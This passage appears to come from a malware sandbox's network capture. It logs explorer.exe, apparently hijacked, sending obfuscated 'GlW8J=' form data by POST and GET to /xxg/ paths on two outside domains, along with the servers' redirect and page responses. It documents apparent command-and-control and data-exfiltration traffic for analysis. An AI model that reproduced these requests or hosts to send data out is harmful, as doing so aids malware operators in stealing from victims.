GlW8J=SeNfaHKuM8RX3zQCW8KWBVwhEyp64Vb0Ph6vRHjFch0a0Igq4XgFyzn0oKn0hflXSOm5IQFPmydaECGoSAHbp51KpPK1I4JD4nBYSLU9YY4ISIvZ18ajThn1XvAWViGM9Z7cBEsPICSKlDrQFkXfpie5PcCIRdBHZRK4RMBA2oxcrPGrbX0oTWaMT7gk24OfqRU_DGB5gVBBee5HBjd9uJwrdkPtzTF1Cvq8(U9NQa8r2cV7bo9DYtOgLUDaOftnWXrKMI75o2ZrL2qlwgiJgpzaiQBxnBPTqUmqeJJLWHoNNgjxwqcN8qUM8I3CXt4pdQQzZmdmE1Qhfxjv30uD0YMvZdp_LRzfevZUSULzU0kQqcUCP_Xjw_11SE6lgTeq3DUlwKMtx0gzoulpng).
Feb 23, 2021 10:18:09.587349892 CET	5228	IN	HTTP/1.1 302 Found Date: Tue, 23 Feb 2021 09:18:09 GMT Server: Apache Location: https://www.premiumnetworkstore.com/xxg/ Content-Length: 224 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 75 6d 6e 65 74 77 6f 72 6b 73 74 6f 72 65 2e 63 6f 6d 2f 78 78 67 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.premiumnetworkstore.com/xxg/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49766	166.62.28.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:09.581161976 CET	5227	OUT	POST /xxg/ HTTP/1.1 Host: www.premiumnetworkstore.com Connection: close Content-Length: 170935 Cache-Control: no-cache Origin: http://www.premiumnetworkstore.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.premiumnetworkstore.com/xxg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 47 6c 57 38 4a 3d 53 65 4e 66 61 46 72 66 4f 4d 56 47 77 42 6b 48 58 73 62 62 46 55 41 7a 41 77 39 70 28 47 36 46 43 54 7e 5f 52 45 37 42 55 41 6c 66 6a 34 38 71 7e 52 30 43 34 7a 6e 31 71 4b 6e 33 32 76 70 5f 62 39 57 78 49 55 64 6c 6d 79 56 5a 4e 6e 43 74 53 77 47 42 6d 35 6f 35 39 5f 65 75 49 38 73 6a 35 42 67 4c 58 4b 6f 39 46 34 41 4b 65 4d 71 64 38 64 57 6d 51 56 28 4b 56 75 5a 51 55 52 54 6c 39 38 79 7a 57 77 4d 4e 4d 7a 6d 42 67 43 62 34 42 7a 7a 75 6c 53 36 2d 41 2d 28 56 56 2d 31 44 59 55 7e 61 62 75 35 44 36 34 5a 53 39 39 75 6a 4f 32 77 37 55 47 72 39 54 36 6b 53 73 39 4f 4b 35 43 51 4e 50 58 64 66 72 45 31 44 51 50 35 66 46 6d 4a 71 7e 35 42 5f 55 45 28 4d 33 44 5a 67 42 70 6d 73 67 42 70 66 41 2d 74 71 69 2d 38 45 57 62 78 4c 58 4e 28 41 46 31 48 42 41 73 6c 76 58 55 48 77 53 59 37 61 71 32 5a 64 54 55 54 53 6e 53 4f 4f 68 35 69 49 28 44 52 64 70 78 6a 65 7e 78 75 79 42 37 31 57 5a 53 77 52 46 43 36 4f 39 70 77 4b 39 49 49 34 71 34 33 63 64 4f 51 55 64 51 52 4b 5a 6b 31 63 43 42 41 68 5a 30 66 34 33 58 32 48 79 59 4e 74 61 4e 5a 48 42 42 50 50 65 76 42 55 41 52 6e 56 62 69 41 51 74 50 63 42 50 61 6a 6a 33 50 31 31 65 6b 37 36 76 44 72 49 6a 6d 6c 58 77 4d 67 62 34 45 5a 61 70 76 51 6d 35 4f 78 4f 50 65 6f 39 31 38 41 65 33 4b 74 33 66 56 7e 72 50 35 75 50 59 46 6c 53 64 79 6f 77 34 31 34 43 66 70 77 51 36 67 68 45 72 51 30 4a 78 6e 48 79 71 6c 30 73 56 57 55 6e 32 78 47 46 53 36 6c 72 41 2d 73 32 7a 52 47 76 44 6f 6c 51 61 68 79 37 44 36 50 75 28 4d 42 55 47 37 6f 32 42 32 72 7a 4f 6b 62 30 37 52 41 68 44 54 4d 51 65 36 6a 43 71 48 76 44 65 46 34 2d 49 4b 78 4f 6e 4f 76 50 31 45 67 47 75 6b 47 35 30 52 76 76 6e 46 61 41 62 64 7a 67 6f 34 63 5f 49 51 57 32 58 52 52 4b 45 6d 47 72 6a 5f 51 61 4e 63 53 75 58 4e 70 75 35 32 68 72 75 30 48 73 54 44 70 33 6f 48 56 4d 28 73 53 36 6e 79 33 38 6f 36 59 68 43 57 66 4e 46 7a 46 52 6f 37 54 52 36 4c 30 6d 67 37 50 2d 73 63 48 62 36 53 35 48 6e 4d 46 51 63 34 69 6e 39 6b 68 67 56 5f 73 49 39 59 28 56 6e 57 69 70 41 5a 63 55 71 48 62 33 4a 64 37 79 7a 76 57 6b 62 4d 35 63 41 36 51 31 50 62 6e 6f 73 76 4c 31 44 63 5a 53 4e 66 4b 37 37 4f 4a 43 64 6b 33 36 55 74 33 4d 37 4f 76 4e 38 43 53 56 32 56 53 78 46 46 44 7a 5a 72 6a 34 49 67 50 78 70 42 6f 5a 58 43 28 5f 56 6e 4f 48 7e 4c 75 59 74 54 78 74 4d 49 6b 71 28 42 7e 48 6a 41 33 49 53 6d 4f 41 68 38 7e 34 73 6e 32 55 78 77 75 54 4f 38 65 4e 75 53 7e 7a 73 64 48 45 42 69 47 62 6c 37 6d 50 4e 36 41 64 65 69 6a 48 31 76 55 76 61 4a 42 71 49 4e 45 64 76 6b 6e 45 69 5f 57 32 58 68 53 59 72 2d 6c 57 79 41 75 75 45 75 30 43 66 76 33 6e 31 49 63 64 64 65 37 4c 44 55 28 44 4f 35 69 35 48 54 4a 64 28 58 6c 5a 64 74 54 33 70 70 38 73 31 52 69 70 5a 58 53 73 36 46 34 77 70 6e 4c 37 53 2d 56 34 67 33 41 48 44 5a 4e 61 69 71 35 36 68 47 64 57 28 39 42 7a 7e 63 36 61 44 43 7e 72 74 4a 50 59 43 76 5a 6d 68 30 77 56 78 76 64 76 31 55 76 79 54 35 33 66 41 7a 47 32 4b 65 50 4a 70 48 42 4e 76 6a 4c 55 61 4a 44 6a 4e 39 4b 41 69 54 70 4e 58 61 73 6f 77 53 51 74 78 55 39 66 6c 64 51 7a 70 33 6d 66 65 56 74 42 46 59 6d 37 59 4d 49 71 61 38 4b 65 65 65 34 4d 78 62 44 53 4e 6c 6c 6a 68 50 4a 32 7e 44 35 53 62 4d 49 73 44 5f 4f 6b 7e 74 6e 57 37 63 73 6a 54 77 73 7a 6e 58 75 68 63 53 7e 49 35 6e 38 2d 68 52 73 58 51 47 4c 6f 6b 73 43 79 79 50 70 44 59 45 4e 33 48 36 32 4e 77 73 67 32 35 53 4f 73 67 43 64 43 30 36 64 43 35 50 6c 51 78 33 58 32 73 39 46 6d 43 61 51 33 43 42 6d 72 79 62 67 75 37 78 46 4b 74 31 4d 33 68 34 68 43 70 37 4a 4e 59 52 47 52 4c 33 50 65 53 6a 37 45 79 54 49 47 36 56 47 71 36 6c 45 65 43 52 62 4a 35 62 73 4d 61 33 28 61 61 76 62 72 32 79 48 42 4b 33 79 6e 53 42 75 38 48 43 4c 46 53 2d 6b 43 67 36 4f 2d 52 37 30 49 65 6e 47 56 67 6e 42 6d 73 6b 45 69 48 6f 56 75 7e 6b 39 54 6a 46 7a 33 44 44 51 39 59 74 48 39 43 6c 66 36 4b 34 37 5f 71 72 5a 6b 45 32 66 35 56 75 5a 55 71 53 71 37 56 63 65 70 31 79 66 71 66 56 66 6e 7e 6f 4b 37 30 71 4d 42 59 44 49 5f 30 6b 68 66 7e 54 74 73 37 50 57 46 77 62 73 30 4f 38 51 4f 59 66 52 6b 63 34 30 76 64 50 78 50 57 69 73 50 75 56 67 4c 79 30 7a 51 75 35 65 4e 50 36 5a 51 30 47 61 77 76 Data Ascii: GlW8J=SeNfaFrfOMVGwBkHXsbbFUAzAw9p(G6FCT~_RE7BUAlfj48q~R0C4zn1qKn32vp_b9WxIUdlmyVZNnCtSwGBm5o59_euI8sj5BgLXKo9F4AKeMqd8dWmQV(KVuZQURTl98yzWwMNMzmBgCb4BzzulS6-A-(VV-1DYU~abu5D64ZS99ujO2w7UGr9T6kSs9OK5CQNPXdfrE1DQP5fFmJq~5B_UE(M3DZgBpmsgBpfA-tqi-8EWbxLXN(AF1HBAslvXUHwSY7aq2ZdTUTSnSOOh5iI(DRdpxje~xuyB71WZSwRFC6O9pwK9II4q43cdOQUdQRKZk1cCBAhZ0f43X2HyYNtaNZHBBPPevBUARnVbiAQtPcBPajj3P11ek76vDrIjmlXwMgb4EZapvQm5OxOPeo918Ae3Kt3fV~rP5uPYFlSdyow414CfpwQ6ghErQ0JxnHyql0sVWUn2xGFS6lrA-s2zRGvDolQahy7D6Pu(MBUG7o2B2rzOkb07RAhDTMQe6jCqHvDeF4-IKxOnOvP1EgGukG50RvvnFaAbdzgo4c_IQW2XRRKEmGrj_QaNcSuXNpu52hru0HsTDp3oHVM(sS6ny38o6YhCWfNFzFRo7TR6L0mg7P-scHb6S5HnMFQc4in9khgV_sI9Y(VnWipAZcUqHb3Jd7yzvWkbM5cA6Q1PbnosvL1DcZSNfK77OJCdk36Ut3M7OvN8CSV2VSxFFDzZrj4IgPxpBoZXC(_VnOH~LuYtTxtMIkq(B~HjA3ISmOAh8~4sn2UxwuTO8eNuS~zsdHEBiGbl7mPN6AdeijH1vUvaJBqINEdvknEi_W2XhSYr-lWyAuuEu0Cfv3n1Icdde7LDU(DO5i5HTJd(XlZdtT3pp8s1RipZXSs6F4wpnL7S-V4g3AHDZNaiq56hGdW(9Bz~c6aDC~rtJPYCvZmh0wVxvdv1UvyT53fAzG2KePJpHBNvjLUaJDjN9KAiTpNXasowSQtxU9fldQzp3mfeVtBFYm7YMIqa8Keee4MxbDSNlljhPJ2~D5SbMIsD_Ok~tnW7csjTwsznXuhcS~I5n8-hRsXQGLoksCyyPpDYEN3H62Nwsg25SOsgCdC06dC5PlQx3X2s9FmCaQ3CBmrybgu7xFKt1M3h4hCp7JNYRGRL3PeSj7EyTIG6VGq6lEeCRbJ5bsMa3(aavbr2yHBK3ynSBu8HCLFS-kCg6O-R70IenGVgnBmskEiHoVu~k9TjFz3DDQ9YtH9Clf6K47_qrZkE2f5VuZUqSq7Vcep1yfqfVfn~oK70qMBYDI_0khf~Tts7PWFwbs0O8QOYfRkc40vdPxPWisPuVgLy0zQu5eNP6ZQ0GawvL~MrKadUYOrvPgOLsL2z9uiGHzqQEuVtBXz9o6u775auYs233sAIuTOQlEUjzILMFaae01j8McULDjEODHC1l309PINGR3cF7Ml8iY8~IfPW_3aaysK1BmvqPeiZILyat1dx5oP8niywAtf4w6zW9Dd8sXBDYdqi5rcBlsYDSxF7aW63kYCjxy7RIl2WSQra9KAK7BpLQYfIy3hfcaBRYLI7aMRkteiqOVUqUkqBKaOx1K5ceft~eKBFO9sTijLRFFe3rp2Kbj-u60Bx7O_uImJXXcEwawLIh73SeJ9jYQFc18csxjQU4mhr7xB9piKa-K2MLPcVW2Tfnf877t4fv8mBGz59qdIr54TU5hhCqWJ5GdcLJ1qCoLJXeA-avEoJ_mhRhqCfbiWIjHOO7RgBrWq0wGYPdB4v_7O6Vz-(KkCDuHU6G9T799u(P8tAUUDJJ6RSIhTFh6bs795ZCbR~WWNrmx9Y7clZ3FJ6taRAPQtNzYiYTtXLwL2(Z5i7ZhRXzqQf2s_t1LeBGFwALSbD4m7D2j_UN(Pm55iZRXGtJALCRTWi9ADEWa34vSr1NLnE7z1ycyU4Ki3cOmwv3nyfGz_DzAESd7i1r62X5yBB46IqU(ETtMnLimgvkaf395NlSX-n7cXxeP5Aa9xCbSzyu0gnggaLZt0x3s1fPYvymerPGQQ0026BpeFORhASx2fB-hcsomjvKqKbXyrG3BwGymW4AMWcHKxsO9a(op4ozQL1Apd1aCK2ktWu4JGT_jlU5wW3t8PIq3jRYTjZ_pngQVXWduJjZ4C2h30X2NbWdOuaIdkBV9IzB9rU4KcrtRCwn08FpZ2zcRX3Qb84o62wlYgH2rBvWvtwYRJAwMYW-BxRWE946cK2GZ5znzJ7GZFXfJKWZTrbl0xJkm6zC7NDmJ8DtBYa4Qn(9QRZ73KEnzRYpVtZ5B2lZEpZ1OQh-j-RJz6WPDkeoToXUW3hIvDllmU7gIULqd2qBI81-LAm-UwbbbFe6jK4fM1wvkMNeocpcZMwgBwIhdRSJETVFTi6pu2Mmc6PLu_aIt4C46NYqXtUqM8HCQuDoj_YdT8urloZJihx_6g0B7YaK4385iblhB1JhsNnQUXqbv3JysmpkWbYQSLHuknCbplninKQFxshh(QAw~ac43Kw31Vd_T9kK2qvi~6THxYFSjlzpm0PVTMd78rH_zHWSo5dBz9tbguu71gOVuoo6v9WNq4LNaIcWbjZH8YrCqfBBg3tBC8eq4WRnQkpAkajZv3ny2ifh2zf-nnTexxTKVYpJcX0T1W0m6eyh3-IN61coJ9PiW86GrePWdVClpwwkLOu2ilLHCg8dCCYFqhReQ11FOsWhgt~W2xh3E0aKASHDgkXAEybE~qKyry5EaoKFbNwpxfYls8dNkVG07DkSvSHsQXA9y_vyLH1g(fFZMM~TVqSUIqQAjPyTEJ5S39BsTa~LsPqxaFd5Qg0r4iRQrC9gH9psr-Xo5EClZKkvwFDIlTECuAl2X4nYJQVdiBXLYKFYkj2qyKVMrf0qXIvcYCd3F7GtL4bhQKN4AWltaUteG2P5g6z_VYVpqY1vP4Bh1SloPSvbToxSIi4dWjDW(_3EXuNErgZ0~VjsjOQuPQs2vJ75KGTnAlAOuLcjl_vuvVLi9p1NAtTUjvEVqPbrw7wYka8LhrglPQRbmOTNDLX_ph0pnwC7kdflYgvumtidk2mMPon_KgrhUGBBF0aNyQklDqmAALACsut_PjouF42vk1Z_1nCPa-T7OeFvdjChU9yJVUmZhmDBI1ZGpnhYgIEfwTwjrkWfx4PQCRec2gBEcvLUraZf~VokBvwX4NSY5FZQ9TAO9ShAZKbbMOX2KqOmN2c5NjoP5432NFS7c22rzJYWGalOgqSqPpG9qlsjM3~P0WiOstMcxXXFnAKLydOJUeVxtOEq0FHDrnLVMQv1EXbL3v4EWvtvvM8gBgRixzKPzMZKLnJslpBpOSa6iyL5dhz0tfmBlDyHCttIBBngehaiX96H0jq1ivt5(dAao679PHzvtBBj9ChYrePzVgeK1aJSx1xPOfdRnlwJYEbT~jJhRoQJq42vvbU7EfWQhUW3rJDUJXGUnAAX60j3zqbNCfTG1m8flMGqZcSq2uOm9uOU2tMvVAI7Ii2tYwgAbAo8aXkvkEA35UYMZ4qQE3QHxiNWWKvB7dbRlanSjlSWYBNLVNmGhMigZCTl6RtqBPnxifr_~FjwgemdDefLy0RXNFE5QqQDKI~wL8uyEqweZIBJvS9yFRB8tjzFdgjJDGqpGq7sCX(vEOU858~tLYDD5on9zVT4rXsamC~MaVgH4MQcDgWybwmzcHGjLjejdeQJK0OQPEVLBylMxloB23TxpjRgnBKLj81MUeZBcq6oHRAUQ7RI5TsAmcyyEcfWRu8rmdIAVVJSiz9Ih6f8y5sY6eqmVeyT8nGv6g~WYumdI0N5dPwSf1fOme~W9pbWarDxTcOl2AHgzHoCqYY8nrkdTou-fFSkTTVJo2(fkkwfB2x4jXGg5zRkpWzpFlfBQjSuERPE4xV8(97qk1xThVYTmJaYNdWT1NRmbe~2atL7nDZKV_KgJKINJ1nGwqa-OFWxz8ArtG0OSKBYEvU2s3OtRn7ZfllFaWKAbYXwg9f1J1f1DUeKoRCeASIZkyV_ikvEj7wr9IFjASEN3fBvbnysspEjIPpiyoSJuF~HOk~Wce
Feb 23, 2021 10:18:10.675653934 CET	6679	IN	HTTP/1.1 302 Found Date: Tue, 23 Feb 2021 09:18:09 GMT Server: Apache Location: https://www.premiumnetworkstore.com/xxg/ Content-Length: 224 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 6d 69 75 6d 6e 65 74 77 6f 72 6b 73 74 6f 72 65 2e 63 6f 6d 2f 78 78 67 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.premiumnetworkstore.com/xxg/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49767	204.11.56.48	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:28.098315001 CET	6684	OUT	GET /xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ+NpuMmHjL7rBp7fN9vXv0Msl1t0&Jt7=XPIX3NrP HTTP/1.1 Host: www.internationalsoccerteams.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 10:18:28.356734037 CET	6685	IN	HTTP/1.1 200 OK Date: Tue, 23 Feb 2021 09:18:28 GMT Server: Apache Set-Cookie: vsid=929vr3616175082306297; expires=Sun, 22-Feb-2026 09:18:28 GMT; Max-Age=157680000; path=/; domain=www.internationalsoccerteams.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_aXeNUKMmAwwQkYYaiStq1L4VPq+H5UWgx3ehjHsh+/1DnmsTqTvVwpM9AyYX/APc9O07BXhzQRFPHK2M2t5CpA== Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 35 64 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 73 6f 63 63 65 72 74 65 61 6d 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 73 6f 63 63 65 72 74 65 61 6d 73 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 73 6f 63 63 65 72 74 65 61 6d 73 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 55 58 68 59 53 45 56 30 54 32 64 6c 64 32 6c 58 51 55 46 56 55 6c 64 32 57 54 55 35 5a 57 5a 6d 4c 32 59 76 4e 30 4a 61 51 55 6c 59 51 32 59 7a 63 31 67 32 54 6e 59 79 56 6a 51 30 52 6c 51 78 4e 47 64 6e 51 32 68 6e 56 32 52 6e 55 58 6c 61 59 6c 70 46 56 6a 46 55 57 6d 52 59 53 47 4a 36 52 6d 4e 6f 59 6b 68 6c 51 6b 5a 49 59 6d 46 54 63 32 52 43 62 6a 6c 31 51 55 68 48 4f 57 52 43 4f 56 63 35 4e 6d 68 75 5a 47 70 4a 52 47 38 39 Data Ascii: 5ddc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.internationalsoccerteams.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.internationalsoccerteams.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0JaQUlYQ2Yzc1g2TnYyVjQ0RlQxNGdnQ2hnV2RnUXlaYlpFVjFUWmRYSGJ6RmNoYkhlQkZIYmFTc2RCbjl1QUhHOWRCOVc5NmhuZGpJRG89

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49768	204.11.56.48	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:30.689017057 CET	6710	OUT	POST /xxg/ HTTP/1.1 Host: www.internationalsoccerteams.com Connection: close Content-Length: 411 Cache-Control: no-cache Origin: http://www.internationalsoccerteams.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.internationalsoccerteams.com/xxg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 31 47 63 42 74 4c 68 48 6f 34 70 43 32 41 39 67 38 42 41 6f 61 30 4b 76 57 75 59 74 2d 31 69 65 6d 78 4b 5a 4e 56 69 6f 38 36 63 79 6f 4b 6e 4d 2d 47 6f 52 4d 72 65 36 57 77 47 74 6c 73 46 76 72 4d 78 51 68 33 55 61 6c 47 72 36 6a 52 49 4f 6c 6e 58 6e 67 58 41 31 44 69 69 71 37 4f 73 59 67 43 74 34 73 4d 7a 72 66 57 2d 71 47 4f 52 32 57 6b 66 4a 53 4c 59 30 72 78 72 52 6a 75 50 4e 78 44 4b 41 35 53 48 6a 44 28 6b 51 7a 78 61 51 36 73 48 54 37 63 66 79 30 7e 79 7e 49 32 58 37 34 46 5a 5a 62 33 36 32 66 41 7a 56 34 35 6c 46 70 7a 77 63 36 65 49 77 4d 56 33 74 4b 44 30 72 72 4a 4a 72 5f 76 76 31 73 54 4b 56 32 71 75 59 71 4c 58 48 35 31 36 4d 5f 37 30 68 33 58 43 56 79 6e 45 37 53 64 46 31 42 51 70 73 64 64 46 74 49 6c 52 33 65 57 79 47 72 51 78 50 78 32 51 33 63 77 4e 56 53 49 61 5a 76 41 4c 71 70 49 54 48 48 56 2d 45 33 58 4a 32 54 66 38 56 6f 62 5f 45 77 4c 4f 4c 31 67 55 44 31 42 72 35 37 55 4a 51 39 37 2d 7a 57 54 67 41 45 46 4c 6d 33 52 70 6e 75 6b 48 44 75 37 32 75 50 31 50 4d 4d 4f 62 28 5f 71 63 6b 45 48 76 6b 42 46 43 71 33 6a 4e 42 52 70 55 37 6d 62 63 78 75 6b 58 6b 67 4b 77 6a 39 4f 7a 38 57 39 6c 66 32 31 37 44 53 79 5f 46 46 4e 39 69 44 51 54 33 4d 6d 50 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GlW8J=Si5QU1GcBtLhHo4pC2A9g8BAoa0KvWuYt-1iemxKZNVio86cyoKnM-GoRMre6WwGtlsFvrMxQh3UalGr6jRIOlnXngXA1Diiq7OsYgCt4sMzrfW-qGOR2WkfJSLY0rxrRjuPNxDKA5SHjD(kQzxaQ6sHT7cfy0~y~I2X74FZZb362fAzV45lFpzwc6eIwMV3tKD0rrJJr_vv1sTKV2quYqLXH516M_70h3XCVynE7SdF1BQpsddFtIlR3eWyGrQxPx2Q3cwNVSIaZvALqpITHHV-E3XJ2Tf8Vob_EwLOL1gUD1Br57UJQ97-zWTgAEFLm3RpnukHDu72uP1PMMOb(_qckEHvkBFCq3jNBRpU7mbcxukXkgKwj9Oz8W9lf217DSy_FFN9iDQT3MmPKQ).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49769	204.11.56.48	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 10:18:30.855941057 CET	6718	OUT	POST /xxg/ HTTP/1.1 Host: www.internationalsoccerteams.com Connection: close Content-Length: 170935 Cache-Control: no-cache Origin: http://www.internationalsoccerteams.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.internationalsoccerteams.com/xxg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 47 6c 57 38 4a 3d 53 69 35 51 55 33 6e 74 44 39 50 4b 52 4d 4d 73 4e 47 51 44 6b 5f 5a 53 35 4b 59 5a 76 42 6a 76 7a 65 4a 79 65 69 4e 77 53 73 46 38 7e 74 4b 63 6c 2d 7e 73 46 2d 47 76 58 4d 72 5a 73 6d 38 55 67 53 51 4e 76 76 30 4c 51 68 76 58 55 44 36 71 36 7a 52 45 63 31 62 76 76 45 28 58 31 46 69 54 70 64 32 4f 64 68 7e 74 68 61 6b 78 33 75 6d 6c 70 48 79 65 6f 57 49 61 61 6e 32 45 31 62 64 54 51 42 54 61 4b 31 6a 55 46 4b 4f 4d 7e 79 75 4a 42 78 51 55 54 71 49 4b 64 59 67 58 39 33 61 32 28 4a 33 67 33 5a 46 57 54 4c 76 6b 68 66 51 52 51 4e 5a 32 45 35 44 4f 63 35 4f 59 33 35 64 63 70 4e 61 35 6d 35 73 73 7a 65 72 74 28 5f 72 37 52 31 43 66 4c 37 61 7a 66 4c 38 34 66 62 50 74 6d 7a 6d 5a 61 7a 75 79 6f 54 68 5a 39 51 67 64 75 4b 39 4e 76 4c 38 44 38 4e 32 6c 49 61 77 35 49 30 6e 35 36 63 78 52 5a 79 49 64 57 35 30 64 75 50 77 63 45 57 6c 66 62 6b 33 68 34 67 61 2d 57 74 54 33 4b 79 33 6c 62 52 34 59 4d 6d 70 58 76 70 34 34 52 66 6e 4b 78 6d 53 5f 4f 68 6f 4a 6d 33 52 50 6e 71 51 39 44 66 66 32 76 66 55 54 4d 76 58 4a 39 5f 72 4f 6d 30 33 70 7e 69 52 53 71 32 4c 4e 48 6a 78 2d 39 56 4c 63 39 59 6f 55 6e 43 79 77 75 74 4f 7a 6e 47 38 4b 57 55 77 79 41 51 62 67 4b 45 74 48 